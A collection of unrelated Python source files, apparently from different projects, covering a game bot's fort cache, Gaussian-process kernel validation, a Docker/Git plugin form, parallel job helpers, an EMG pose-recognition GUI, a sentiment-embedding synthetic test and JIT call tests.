self.recent_forts = cached_recent_forts[-num_recent_forts:]
else:
self.recent_forts = cached_recent_forts
self.event_manager.emit(
'loaded_cached_forts',
sender=self,
level='debug',
formatted='Loaded cached forts...'
)
except IOError:
self.event_manager.emit(
'no_cached_forts',
sender=self,
level='debug',
formatted='Starting new cached forts for {path}',
data={'path': cached_forts_path}
)
def _refresh_inventory(self):
# Perform inventory update every n seconds
now = time.time()
if now - self.last_inventory_refresh >= self.inventory_refresh_threshold:
inventory.refresh_inventory()
self.last_inventory_refresh = now
self.inventory_refresh_counter += 1
|
bo_validation.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Dec 19 15:51:02 2015
@author: alexeyche
"""
#from bayesopt import ContinuousGaussModel
#from bayesopt import ContinuousStudentTModel
from matplotlib import pyplot as plt
import random
from multiprocessing import Process, Queue
from collections import defaultdict
import os
from os.path import join as pj
import numpy as np
def make_dir(*a):
if not os.path.exists(pj(*a)):
os.mkdir(pj(*a))
return pj(*a)
#class ConcreteContinuousGaussModel(ContinuousGaussModel):
# def __init__(self, ndim, params):
# assert "Gaussian" in params["surr_name"]
# ContinuousGaussModel.__init__(self, ndim, params)
#
# def evaluateSample(self, Xin):
# pass # mock for now
#
#class ConcreteContinuousStudentTModel(ContinuousStudentTModel):
# def __init__(self, ndim, params):
# assert "StudentT" in params["surr_name"]
# ContinuousStudentTModel.__init__(self, ndim, params)
#
# def evaluateSample(self, Xin):
# pass # mock for now
#
#
#def create_model(ndim, params):
# if "Gaussian" in params["surr_name"]:
# return ConcreteContinuousGaussModel(ndim, params)
# elif "StudentT" in params["surr_name"]:
# return ConcreteContinuousStudentTModel(ndim, params)
# else:
# raise Exception("Unknown model: {}".format(params["surr_name"]))
def generate_validation_ids(n, nfold):
test_idx = random.sample(range(n), n/nfold)
train_idx = []
j = 0
for i in sorted(test_idx):
train_idx += range(j, i)
j = i+1
train_idx += range(j, n)
return train_idx, test_idx
def parallel(f, q):
def wrap(*args, **kwargs):
ret = f(*args, **kwargs)
q.put(ret)
return wrap
def run_validation(X, Y, nfold, params):
test_idx, train_idx = generate_validation_ids(len(X), nfold) # test instead of train on purpose
Xtrain = X[train_idx]
Ytrain = Y[train_idx]
Xtest= X[test_idx]
Ytest= Y[test_idx]
model = create_model(Xtrain.shape[1], params)
model.initWithPoints(Xtrain, Ytrain)
preds = [ model.getPrediction(x) for x in Xtest ]
means = [ p.getMean() for p in preds ]
se = (means-Ytest)**2
mse = sum(se)/len(se)
return Ytest, means, se, mse
def plot_validation(Ytest, means, se, mse):
plt.plot(Ytest, "g-", means, "b-", se, "r-")
plt.title("MSE: {}".format(mse))
def get_validation_params(params = {}):
params["l_all"] = True
params['kernel_name'] = params.get("kernel_name", "kMaternARD5")
params["l_type"] = params.get("l_type", "empirical") # empirical fixed mcmc
params["sc_type"] = params.get("sc_type", "ml") # # map mtl ml loocv
params['verbose_level'] = params.get("verbose_level", 1)
params['surr_name'] = params.get("surr_name", "sGaussianProcessML")
return params
def run_search(X, Y, kernels, nfold, params = {}, generate_plots=True, number_of_runs=100):
kres = defaultdict(list)
if generate_plots:
plt.ioff()
for k in kernels:
params = get_validation_params(params)
params["kernel_name"] = k
procs = []
for fi in xrange(number_of_runs):
q = Queue()
p = Process(target=parallel(run_validation, q), args=(X, Y, nfold, params))
p.start()
procs.append((p, q))
for p, q in procs:
p.join()
kres[k].append(q.get())
if generate_plots:
make_dir(k)
fi = 0
for res in kres[k]:
f = plt.figure()
plot_validation(*res)
f.savefig(pj(k, "{}.png".format(fi)))
plt.close(f)
fi += 1
kres_ag = [ (k, sum([ vr[3] for vr in v ])/len(v)) for k, v in kres.items() ]
if generate_plots:
plt.ion()
return sorted(kres_ag, key=lambda x: x[1])
def combine_kernels(kernels, composite_kernels):
k_ids = np.asarray(range(len(kernels)))
ck_ids = np.asarray(range(len(composite_kernels)))
axis_slices = [k_ids]*3 + [ck_ids]*2
points = np.vstack(np.meshgrid(*axis_slices)).reshape(len(axis_slices), -1).T
kernels_to_search = []
for p in points:
s = "{comp1}({k1}, {comp2}({k2}, {k3}))".format(
comp1 = composite_kernels[p[3]]
, comp2 = composite_kernels[p[4]]
, k1 = kernels[p[0]]
, k2 = kernels[p[1]]
, k3 = kernels[p[2]]
)
kernels_to_search.append(s)
kernels_to_search += kernels
return kernels_to_search
|
add.py
|
import threading
import time
import npyscreen
from vent.api.actions import Action
from vent.api.plugin_helpers import PluginHelper
from vent.menus.add_options import AddOptionsForm
from vent.menus.editor import EditorForm
class AddForm(npyscreen.ActionForm):
""" For for adding a new repo """
default_repo = 'https://github.com/cyberreboot/vent-plugins'
def create(self):
""" Create widgets for AddForm """
self.add_handlers({'^T': self.quit, '^Q': self.quit})
self.add(npyscreen.Textfield,
value='Add a plugin from a Git repository or an image from a '
'Docker registry.',
editable=False,
color='STANDOUT')
self.add(npyscreen.Textfield,
value='For Git repositories, you can optionally specify a '
'username and password',
editable=False,
color='STANDOUT')
self.add(npyscreen.Textfield,
value='for private repositories.',
editable=False,
color='STANDOUT')
self.add(npyscreen.Textfield,
value='For Docker images, specify a name for referencing the '
'image that is being',
editable=False,
color='STANDOUT')
self.add(npyscreen.Textfield,
value='added and optionally override the tag and/or the '
'registry and specify',
editable=False,
color='STANDOUT')
self.add(npyscreen.Textfield,
value='comma-separated groups this image should belong to.',
editable=False,
color='STANDOUT')
self.nextrely += 1
self.repo = self.add(npyscreen.TitleText,
name='Repository',
value=self.default_repo)
self.user = self.add(npyscreen.TitleText, name='Username')
self.pw = self.add(npyscreen.TitlePassword, name='Password')
self.nextrely += 1
self.add(npyscreen.TitleText,
name='OR',
editable=False,
labelColor='STANDOUT')
self.nextrely += 1
self.image = self.add(npyscreen.TitleText, name='Image')
self.link_name = self.add(npyscreen.TitleText,
name='Name')
self.tag = self.add(npyscreen.TitleText, name='Tag', value='latest')
self.registry = self.add(npyscreen.TitleText,
name='Registry',
value='docker.io')
self.groups = self.add(npyscreen.TitleText, name='Groups')
self.repo.when_value_edited()
def quit(self, *args, **kwargs):
""" Overridden to switch back to MAIN form """
self.parentApp.switchForm('MAIN')
def on_ok(self):
""" Add the repository """
def popup(thr, add_type, title):
"""
Start the thread and display a popup of the plugin being cloned
until the thread is finished
"""
thr.start()
tool_str = 'Cloning repository...'
if add_type == 'image':
tool_str = 'Pulling image...'
npyscreen.notify_wait(tool_str, title=title)
while thr.is_alive():
time.sleep(1)
return
if self.image.value and self.link_name.value:
api_action = Action()
thr = threading.Thread(target=api_action.add_image, args=(),
kwargs={'image': self.image.value,
'link_name': self.link_name.value,
'tag': self.tag.value,
'registry': self.registry.value,
'groups': self.groups.value})
popup(thr, 'image', 'Please wait, adding image...')
npyscreen.notify_confirm('Done adding image.', title='Added image')
editor_args = {'tool_name': self.image.value,
'version': self.tag.value,
'get_configure': api_action.get_configure,
'save_configure': api_action.save_configure,
'restart_tools': api_action.restart_tools,
'clean': api_action.clean,
'prep_start': api_action.prep_start,
'start_tools': api_action.start,
'from_registry': True,
'just_downloaded': True,
'link_name': self.link_name.value,
'groups': self.groups.value}
self.parentApp.addForm('CONFIGUREIMAGE', EditorForm,
name='Specify vent.template settings for '
'image pulled (optional)', **editor_args)
self.parentApp.change_form('CONFIGUREIMAGE')
elif self.image.value:
npyscreen.notify_confirm('A name needs to be supplied for '
'the image being added!',
title='Specify a name for the image',
form_color='CAUTION')
elif self.repo.value:
self.parentApp.repo_value['repo'] = self.repo.value.lower()
p_helper = PluginHelper()
thr = threading.Thread(target=p_helper.clone, args=(),
kwargs={'repo': self.repo.value.lower(),
'user': self.user.value,
'pw': self.pw.value})
popup(thr, 'repository', 'Please wait, adding repository...')
self.parentApp.addForm('ADDOPTIONS',
AddOptionsForm,
name='Set options for new plugin'
'\t\t\t\t\t\t^Q to quit',
color='CONTROL')
self.parentApp.change_form('ADDOPTIONS')
else:
npyscreen.notify_confirm('Either a repository or an image '
'name must be specified!',
title='Specify plugin to add',
form_color='CAUTION')
return
def on_cancel(self):
""" When user clicks cancel, will return to MAIN """
self.quit()
|
_parallelize.py
|
import os
from multiprocessing import Manager
from threading import Thread
from typing import Any, Callable, Optional, Sequence, Union
from joblib import delayed, Parallel
import numpy as np
from scipy.sparse import issparse, spmatrix
from scvelo import logging as logg
_msg_shown = False
def get_n_jobs(n_jobs):
if n_jobs is None or (n_jobs < 0 and os.cpu_count() + 1 + n_jobs <= 0):
return 1
elif n_jobs > os.cpu_count():
return os.cpu_count()
elif n_jobs < 0:
return os.cpu_count() + 1 + n_jobs
else:
return n_jobs
def parallelize(
callback: Callable[[Any], Any],
collection: Union[spmatrix, Sequence[Any]],
n_jobs: Optional[int] = None,
n_split: Optional[int] = None,
unit: str = "",
as_array: bool = True,
use_ixs: bool = False,
backend: str = "loky",
extractor: Optional[Callable[[Any], Any]] = None,
show_progress_bar: bool = True,
) -> Union[np.ndarray, Any]:
"""
Parallelize function call over a collection of elements.
Parameters
----------
callback
Function to parallelize.
collection
Sequence of items which to chunkify.
n_jobs
Number of parallel jobs.
n_split
Split :paramref:`collection` into :paramref:`n_split` chunks.
If `None`, split into :paramref:`n_jobs` chunks.
unit
Unit of the progress bar.
as_array
Whether to convert the results not :class:`numpy.ndarray`.
use_ixs
Whether to pass indices to the callback.
backend
Which backend to use for multiprocessing. See :class:`joblib.Parallel` for valid
options.
extractor
Function to apply to the result after all jobs have finished.
show_progress_bar
Whether to show a progress bar.
Returns
-------
:class:`numpy.ndarray`
Result depending on :paramref:`extractor` and :paramref:`as_array`.
"""
if show_progress_bar:
try:
try:
from tqdm.notebook import tqdm
except ImportError:
from tqdm import tqdm_notebook as tqdm
import ipywidgets # noqa
except ImportError:
global _msg_shown
tqdm = None
if not _msg_shown:
logg.warn(
"Unable to create progress bar. "
"Consider installing `tqdm` as `pip install tqdm` "
"and `ipywidgets` as `pip install ipywidgets`,\n"
"or disable the progress bar using `show_progress_bar=False`."
)
_msg_shown = True
else:
tqdm = None
def update(pbar, queue, n_total):
n_finished = 0
while n_finished < n_total:
try:
res = queue.get()
except EOFError as e:
if not n_finished != n_total:
raise RuntimeError(
f"Finished only `{n_finished} out of `{n_total}` tasks.`"
) from e
break
assert res in (None, (1, None), 1) # (None, 1) means only 1 job
if res == (1, None):
n_finished += 1
if pbar is not None:
pbar.update()
elif res is None:
n_finished += 1
elif pbar is not None:
pbar.update()
if pbar is not None:
pbar.close()
def wrapper(*args, **kwargs):
if pass_queue and show_progress_bar:
pbar = None if tqdm is None else tqdm(total=col_len, unit=unit)
queue = Manager().Queue()
thread = Thread(target=update, args=(pbar, queue, len(collections)))
thread.start()
else:
pbar, queue, thread = None, None, None
res = Parallel(n_jobs=n_jobs, backend=backend)(
delayed(callback)(
*((i, cs) if use_ixs else (cs,)),
*args,
**kwargs,
queue=queue,
)
for i, cs in enumerate(collections)
)
res = np.array(res) if as_array else res
if thread is not None:
thread.join()
return res if extractor is None else extractor(res)
col_len = collection.shape[0] if issparse(collection) else len(collection)
if n_split is None:
n_split = get_n_jobs(n_jobs=n_jobs)
if issparse(collection):
if n_split == collection.shape[0]:
collections = [collection[[ix], :] for ix in range(collection.shape[0])]
else:
step = collection.shape[0] // n_split
ixs = [
np.arange(i * step, min((i + 1) * step, collection.shape[0]))
for i in range(n_split)
]
ixs[-1] = np.append(
ixs[-1], np.arange(ixs[-1][-1] + 1, collection.shape[0])
)
collections = [collection[ix, :] for ix in filter(len, ixs)]
else:
collections = list(filter(len, np.array_split(collection, n_split)))
pass_queue = not hasattr(callback, "py_func") # we'd be inside a numba function
return wrapper
|
gui.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from Tkinter import *
import Tkinter
import Similarity
import numpy as np
import rospy, math
from std_msgs.msg import UInt8, String
from sensor_msgs.msg import Imu
from geometry_msgs.msg import Twist, Vector3
from ros_myo.msg import EmgArray
import threading as th
from copy import deepcopy
import ttk, time, fcntl, termios, sys, os
import serial
# ----------------------------------- class -------------------------------------- #
class Subscribers():
def __init__(self):
self.subscriber = rospy.Subscriber('/myo_raw/myo_emg', EmgArray, self.callback)
self.message = EmgArray
self.EMG = [0 for i in range(8)]
self.count1 = 0
self.count2 = 0
self.buf = [0 for i in range(8)]
self.emgs = [0 for i in range(8)]
self.measurement_n = 50
def callback(self, message):
self.emgs = message.data
for i in range(len(self.emgs)):
self.buf[i] += self.emgs[i]
self.count1 += 1
if self.count1 == self.measurement_n:
for i in range(len(self.buf)):
sub.EMG[i] = self.buf[i] / self.measurement_n
self.count1 = 0
self.buf = [0 for i in range(8)]
# print(sim.Values)
# print(sim.Simiraly)
# ---------------------------------- functions ------------------------------------ #
def button1_click():
if sub.EMG == None:
return
if tb1.get() == tb_defalt:
tb2_print("Please input pose name")
else:
countdown(2)
sim.Add(deepcopy(sub.EMG))
Posenames.append(tb1.get())
finger_state.append([0, 0, 0, 0, 0, 0])
lb.insert(END, tb1.get())
cb['values'] = Posenames
tb1_clear()
def button2_click():
if cb.current() >= 0:
Posenames.pop(cb.current())
finger_state.pop(cb.current())
sim.Delete(cb.current())
cb['values'] = Posenames
lb_update()
def button3_click():
global st_flg
st_flg = not st_flg
def button4_click():
global finger_state
if tb1.get() == tb_defalt or cb.current == -1:
tb2_print("Please input finger state")
tb2_print("ex) 1 1 0 1 1 1 ")
else:
arr = tb1.get().split()
print(arr)
finger_state[cb.current()] = arr
def find_proc():
sub_win = Toplevel()
var = StringVar()
l = Label(sub_win, textvariable=var, font=("Helvetica", "96", "bold"))
l.pack()
while True:
pre_ind = -1
while st_flg:
ind, coef = sim.Find(sub.emgs)
# print(ind, coef)
if coef >= Min:
if ind != pre_ind:
tb2.delete("1.0", "end")
tb2.insert(END, "\n {} coef = {}".format(Posenames[ind], round(coef, 4)))
var.set(Posenames[ind])
pre_ind = ind
serialWrite(finger_state[ind])
def change_threshold(*args):
global Min
Min = float(s1.get()) / 100
tb2_print("Min = {}".format(Min))
def change_mesurement_n(*args):
sim.measurement_n = s2.get()
tb2_print("Mesurement Numeber = {}".format(sim.measurement_n))
def tb1_clear():
tb1.delete(0, Tkinter.END)
tb1.insert(Tkinter.END, tb_defalt)
def tb2_print(s):
tb2.insert(END, "\n{}".format(s))
tb2.see("end")
def countdown(t):
for i in range(t):
time.sleep(1)
def lb_update():
lb.delete(0, END)
for i in Posenames:
lb.insert(END, i)
def save_param():
global file_name
if tb1.get() == tb_defalt:
print("Please input file name.")
else:
file_name = tb1.get()
np.savez(file_name + ".npz", x=np.array(Posenames), y=np.array(finger_state))
sim.Save(file_name)
tb1_clear()
tb2_print("Complete")
def load_param():
global file_name, Posenames, finger_state
if tb1.get() == tb_defalt:
print("Please input file name.")
else:
file_name = tb1.get()
zp = np.load(file_name+".npz")
Posenames = zp["x"].tolist()
finger_state = zp["y"].tolist()
# print(finger_state)
sim.Load(file_name)
cb['values'] = Posenames
lb_update()
tb1_clear()
tb2_print("Loaded")
def serialWrite(farray):
a = []
for i in farray:
a.append(int(i))
# print(a)
buf = [0xfe, 0xef, len(farray)] + a
# [ser.write(i.to_bytes(1, byteorder='little')) for i in buf]
if connected:
ser.flushInput()
ser.flushOutput()
[ser.write(chr(i)) for i in buf]
def sum_str(str_arr):
string = ""
for i in str_arr:
string += i
return string
# ----------------------------------- Valiables ----------------------------------- #
sub = Subscribers()
sim = Similarity.Similarity()
Posenames = []
finger_state = []
root = Tk()
Min = 0.95
tb_defalt = "new pose name or filename to load and save"
th1 = th.Thread(target=find_proc)
st_flg = False
file_path = "/home/fumyia/"
portname = "/dev/ttyACM1"
baudrate = 115200
connected = False
try:
ser = serial.Serial(portname, baudrate)
connected = True
print("Mbed is connected")
except serial.serialutil.SerialException:
connected = False
explanations = []
explanations.append("1. ポーズの登録\n・TextBoxに登録したいポーズの名前を入力\n・Addボタンを押し、手を登録したいポーズにする\n・テキストボックスに結果が表示されれば登録完了。ComboBoxに登録したポーズが追加される\n\n")
explanations.append("2. ポーズの削除\n・現状、Editボタンが機能しないため、教師データを変更したい場合は削除する必要がある\n・ComboBoxから削除したいポーズを選択する\n・Deleteボタンを押し、削除する\n\n")
explanations.append("3. ロボットハンドの状態\n・ComboBoxから設定したいポーズの名前を選択する\n・親指の回内外, 親指の屈曲, 人差し指の屈曲, 中指の屈曲, 薬指の屈曲, 小指の屈曲\n・上の順に曲げるなら1, そうでない場合は0を入力する\n・例)1, 1, 1, 0, 1, 1 \n\n")
explanations.append("4. ポーズ判定の実行\n・Find/Stopボタンを押すとポーズ判別が開始する\n・判定を終了したい場合は同様にFind/Stopボタンを押す\n\n")
explanations.append("5. セーブとロード\n・テキストボックスにセーブ(ロード)したいファイル名を入力し、Save(Load)ボタンを押す\n\n")
explanation = sum_str(explanations)
# ------------------------------------ Widgets ------------------------------------ #
root.title("Pose Estimation")
#root.geometry("400x300")
button1 = Button(root, text="Add", command=button1_click, height=2, width=5) # button2
button2 = Button(root, text="Delete", command=button2_click, height=2, width=5) # button3
button3 = Button(root, text="Find/Stop", command=button3_click, height=2, width=5)
button4 = Button(root, text="Edit", command=button4_click, height=2, width=5)
button5 = Button(root, text="Save", command=save_param, height=2, width=5)
button6 = Button(root, text="Load", command=load_param, height=2, width=5)
# button6 = Button(root, text="", command=, height=2, width=5)
cb = ttk.Combobox(root)
label_th = Label(root, text="Threshold[%]")
label_n = Label(root, text="Measurement number")
label_ex = Label(root, text=explanation, anchor="w", justify="left", width=60)
tb1 = Entry(root)
tb2 = Text(root, width=24, height=10.5)
lb = Listbox(root)
s1 = Scale(root, orient='h', from_=0, to=100, command=change_threshold, length=200)
s2 = Scale(root, orient='h', from_=20, to=50, command=change_mesurement_n, length=200)
# ----------------------------------- main ----------------------------------------- #
if __name__ == "__main__":
# Arrangement
button1.grid(row=0, column=0, padx=5, pady=5)
button2.grid(row=0, column=1, padx=5, pady=5)
button3.grid(row=1, column=0, padx=5, pady=5)
button4.grid(row=1, column=1, padx=5, pady=5)
button5.grid(row=2, column=0, padx=5, pady=5)
button6.grid(row=2, column=1, padx=5, pady=5)
cb.grid(row=3, column=0, padx=5, pady=5, columnspan=5)
tb1.grid(row=4, column=0, padx=5, pady=5, columnspan=5)
lb.grid(row=5, column=0)
tb2.grid(row=5, column=1)
label_th.grid(row=6, columnspan=8, ipadx=0)
s1.grid(row=7, columnspan=8, ipadx=0)
label_n.grid(row=8, columnspan=8, ipadx=0)
s2.grid(row=9, columnspan=8, ipadx=0)
label_ex.grid(row=10, columnspan=8, ipadx=0)
s1.set(Min * 100)
s2.set(50)
# initialize
tb1.insert(Tkinter.END, tb_defalt)
rospy.init_node("gui")
cb['values'] = Posenames
th1.start()
# main process
root.mainloop()
rospy.spin()
|
synthetic_test.py
|
from socialsent3 import constants
from socialsent3 import util
from socialsent3 import polarity_induction_methods
import time
from socialsent3 import seeds
from socialsent3.historical import vocab
import random
import numpy as np
from socialsent3 import evaluate_methods
from multiprocessing.queues import Empty
from multiprocessing import Process, Queue
from socialsent3.representations.representation_factory import create_representation
from socialsent3.representations.embedding import Embedding
from numpy import vstack
from scipy.stats import logistic
from scipy.sparse import csr_matrix
SYNTH_FREQ = 5 * 10 ** -5.0
# NEW_POS = ["cheerful", "beautiful", "charming", "pleasant", "sweet", "favourable", "cheery"]
NEW_POS = ["cheerful", "beautiful", "charming", "merry", "pleasing"]
NEW_NEG = ["hideous", "terrible", "dreadful", "worst", "awful"]
# NEW_NEG = ["disgusting", "hideous", "terrible", "unhappy", "nasty", "repulsive", "offensive"]
OLD_POS = NEW_POS
OLD_NEG = NEW_NEG
YEARS = range(1850, 1991, 10)
"""
Runs synthetic test of amelioration and pejoration.
"""
def worker(proc_num, queue, iter):
while True:
time.sleep(random.random() * 10)
try:
year = queue.get(block=False)
except Empty:
print(proc_num, "Finished")
return
np.random.seed()
positive_seeds, negative_seeds = seeds.hist_seeds()
year = str(year)
print(proc_num, "On year", year)
words = vocab.pos_words(year, "ADJ")
embed = create_representation("SVD", constants.COHA_EMBEDDINGS + year)
print(year, len(words))
embed_words = set(embed.iw)
words = words.intersection(embed_words)
print(year, len(words))
# counts = create_representation("Explicit", constants.COHA_COUNTS + year, normalize=False)
# ppmi = create_representation("Explicit", constants.COHA_PPMI + year)
weight = _make_weight(float(year))
print(year, weight)
embed = embed.get_subembed(words)
test_embed = make_synthetic_data(embed, embed, words, weight, seed_offset=iter)
polarities = evaluate_methods.run_method(positive_seeds, negative_seeds,
test_embed,
method=polarity_induction_methods.random_walk,
beta=0.9, nn=25,
**evaluate_methods.DEFAULT_ARGUMENTS)
util.write_pickle(polarities, constants.POLARITIES + year + '-synth-adj-coha-' + str(iter) + '.pkl')
def _make_weight(year):
scaled = 2 * (year - YEARS[0]) / (YEARS[-1] - YEARS[0]) - 1
scaled *= -4
return logistic.cdf(scaled)
def make_synthetic_data(ppmi, counts, word_subset, new_weight, num_synth=10,
old_pos=OLD_POS, new_pos=NEW_POS, old_neg=OLD_NEG, new_neg=NEW_NEG, dim=300, seed_offset=0):
# print new_weight
# ppmi = ppmi.get_subembed(word_subset, restrict_context=False)
amel_vecs = []
print("Sampling positive...")
for i in range(num_synth):
amel_vecs.append(_sample_vec2(new_pos, old_neg, counts, new_weight, seed=i + seed_offset))
amel_mat = vstack(amel_vecs)
pejor_vecs = []
print("Sampling negative...")
for i in range(num_synth):
pejor_vecs.append(_sample_vec2(old_pos, new_neg, counts, 1 - new_weight, seed=i + num_synth + seed_offset))
pejor_mat = vstack(pejor_vecs)
print("Making matrix...")
# ppmi_mat = vstack([ppmi.m, amel_mat, pejor_mat])
u = vstack([counts.m, amel_mat, pejor_mat])
print("SVD on matrix...")
# u, s, v = randomized_svd(ppmi_mat, n_components=dim, n_iter=2)
new_vocab = ppmi.iw
new_vocab.extend(['a-{0:d}'.format(i) for i in range(num_synth)])
new_vocab.extend(['p-{0:d}'.format(i) for i in range(num_synth)])
return Embedding(u, new_vocab)
def _sample_vec2(pos_words, neg_words, counts, pos_weight, seed=1):
vec = np.zeros((counts.m.shape[1],))
np.random.seed(seed)
pos_weights = np.random.dirichlet(np.repeat([0.1], len(pos_words)))
pos_weights = pos_weights / np.sum(pos_weights)
print(pos_weights)
for i, word in enumerate(pos_words):
sample_vec = pos_weights[i] * pos_weight * counts.represent(word)
vec += sample_vec
neg_weights = np.random.dirichlet(np.repeat([0.1], len(pos_words)))
neg_weights = neg_weights / np.sum(neg_weights)
for i, word in enumerate(neg_words):
sample_vec = neg_weights[i] * (1 - pos_weight) * counts.represent(word)
vec += sample_vec
return vec / np.linalg.norm(vec)
def _sample_vec(pos_words, neg_words, counts, pos_weight, seed):
sample_size = counts.m.sum() * SYNTH_FREQ / len(neg_words)
vec = np.zeros((counts.m.shape[1],))
np.random.seed(seed)
pos_weights = np.random.uniform(size=len(pos_words))
pos_weights = pos_weights / np.sum(pos_weights)
print(pos_weights)
for i, word in enumerate(pos_words):
sample_vec = counts.represent(word)
sample_vec /= float(sample_vec.sum())
sample_vec = pos_weights[i] * pos_weight * np.random.multinomial(sample_size, sample_vec.todense().A[0])
sample_vec = np.clip(sample_vec, 0, sample_size)
if not np.isfinite(sample_vec.sum()):
print("Infinite sample with", word)
continue
vec += sample_vec
neg_weights = np.random.uniform(size=len(neg_words))
neg_weights = neg_weights / np.sum(neg_weights)
for i, word in enumerate(neg_words):
sample_vec = counts.represent(word)
sample_vec /= float(sample_vec.sum())
sample_vec = neg_weights[i] * (1 - pos_weight) * np.random.multinomial(sample_size, sample_vec.todense().A[0])
sample_vec = np.clip(sample_vec, 0, sample_size)
if not np.isfinite(sample_vec.sum()):
print("Infinite sample with", word)
continue
vec += sample_vec
vec = csr_matrix(vec)
new_mat = vstack([counts.m, vec])
new_mat = new_mat / new_mat.sum()
synth_prob = new_mat[-1, :].sum()
for neigh in vec.nonzero()[1]:
val = max(np.log(new_mat[-1, neigh]
/ (synth_prob * new_mat[neigh, :].sum() ** 0.75)),
0)
if np.isfinite(val):
vec[0, neigh] = val
return vec / np.sqrt((vec.multiply(vec).sum()))
def main(iterable):
num_procs = 20
queue = Queue()
for year in YEARS:
queue.put(year)
procs = [Process(target=worker, args=[i, queue, iterable]) for i in range(num_procs)]
for p in procs:
p.start()
for p in procs:
p.join()
if __name__ == "__main__":
for _iterable in range(0, 50):
main(_iterable)
|
__init__.py
|
from .authenticity import AuthenticityCheckLoopController
from .healthcheck import HealthCheckLoopController
from .abstract import AbstractLoopController
from ..entity.host import Node
from time import sleep
import threading
import tornado.log
import traceback
import sys
class ShellController:
threads = [] # type: list[threading.Thread]
nodes = {} # type: dict[Node]
sleep_time = 30 # type: int
controllers = [] # type:
def __init__(self, nodes: dict, sleep_time: int, validators: dict):
self.nodes = nodes
self.sleep_time = sleep_time
self.controllers = [
AuthenticityCheckLoopController({}, validators['HostAuthenticity']),
HealthCheckLoopController({}, validators['Health'])
]
def start(self):
for node_name, node in self.nodes.items():
self._spawn_thread_for_node(node)
sleep(1)
def _spawn_thread_for_node(self, node: Node):
self._create_thread(self._create_worker_loop, [node])
def _create_worker_loop(self, node: Node):
while True:
for controller in self.controllers:
try:
controller.perform_check(node)
except Exception as e:
tornado.log.app_log.warning(
'Audit check was interrupted for node ' + str(node) + ' because of an error'
)
tornado.log.app_log.error('[' + str(node) + '] ' + str(e))
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback, limit=10, file=sys.stdout)
sleep(self.sleep_time)
def _create_thread(self, target, args):
healthcheck_thread = threading.Thread(target=target, args=args)
healthcheck_thread.daemon = True
healthcheck_thread.start()
self.threads.append(healthcheck_thread)
|
test_cinderjit.py
|
# Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com)
import _testcapi
import asyncio
import builtins
import dis
import gc
import sys
import threading
import types
import unittest
import warnings
import weakref
from compiler.static import StaticCodeGenerator
try:
with warnings.catch_warnings():
warnings.simplefilter("ignore")
from .test_compiler.test_static import StaticTestBase
except ImportError:
from test_compiler.test_static import StaticTestBase
from contextlib import contextmanager
try:
import cinderjit
except:
cinderjit = None
# Decorator to return a new version of the function with an alternate globals
# dict.
def with_globals(gbls):
def decorator(func):
new_func = type(func)(
func.__code__, gbls, func.__name__, func.__defaults__, func.__closure__
)
new_func.__module__ = func.__module__
new_func.__kwdefaults__ = func.__kwdefaults__
return new_func
return decorator
@unittest.failUnlessJITCompiled
def get_meaning_of_life(obj):
return obj.meaning_of_life()
def nothing():
return 0
def _simpleFunc(a, b):
return a, b
class _CallableObj:
def __call__(self, a, b):
return self, a, b
class CallKWArgsTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def test_call_basic_function_pos_and_kw(self):
r = _simpleFunc(1, b=2)
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def test_call_basic_function_kw_only(self):
r = _simpleFunc(b=2, a=1)
self.assertEqual(r, (1, 2))
r = _simpleFunc(a=1, b=2)
self.assertEqual(r, (1, 2))
@staticmethod
def _f1(a, b):
return a, b
@unittest.failUnlessJITCompiled
def test_call_class_static_pos_and_kw(self):
r = CallKWArgsTests._f1(1, b=2)
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def test_call_class_static_kw_only(self):
r = CallKWArgsTests._f1(b=2, a=1)
self.assertEqual(r, (1, 2))
def _f2(self, a, b):
return self, a, b
@unittest.failUnlessJITCompiled
def test_call_method_kw_and_pos(self):
r = self._f2(1, b=2)
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_method_kw_only(self):
r = self._f2(b=2, a=1)
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_bound_method_kw_and_pos(self):
f = self._f2
r = f(1, b=2)
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_bound_method_kw_only(self):
f = self._f2
r = f(b=2, a=1)
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_obj_kw_and_pos(self):
o = _CallableObj()
r = o(1, b=2)
self.assertEqual(r, (o, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_obj_kw_only(self):
o = _CallableObj()
r = o(b=2, a=1)
self.assertEqual(r, (o, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_c_func(self):
self.assertEqual(__import__("sys", globals=None), sys)
class CallExTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def test_call_dynamic_kw_dict(self):
r = _simpleFunc(**{"b": 2, "a": 1})
self.assertEqual(r, (1, 2))
class _DummyMapping:
def keys(self):
return ("a", "b")
def __getitem__(self, k):
return {"a": 1, "b": 2}[k]
@unittest.failUnlessJITCompiled
def test_call_dynamic_kw_dict(self):
r = _simpleFunc(**CallExTests._DummyMapping())
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def test_call_dynamic_pos_tuple(self):
r = _simpleFunc(*(1, 2))
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def test_call_dynamic_pos_list(self):
r = _simpleFunc(*[1, 2])
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def test_call_dynamic_pos_and_kw(self):
r = _simpleFunc(*(1,), **{"b": 2})
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def _doCall(self, args, kwargs):
return _simpleFunc(*args, **kwargs)
def test_invalid_kw_type(self):
err = r"_simpleFunc\(\) argument after \*\* must be a mapping, not int"
with self.assertRaisesRegex(TypeError, err):
self._doCall([], 1)
@unittest.skipUnlessCinderJITEnabled("Exposes interpreter reference leak")
def test_invalid_pos_type(self):
err = r"_simpleFunc\(\) argument after \* must be an iterable, not int"
with self.assertRaisesRegex(TypeError, err):
self._doCall(1, {})
@staticmethod
def _f1(a, b):
return a, b
@unittest.failUnlessJITCompiled
def test_call_class_static_pos_and_kw(self):
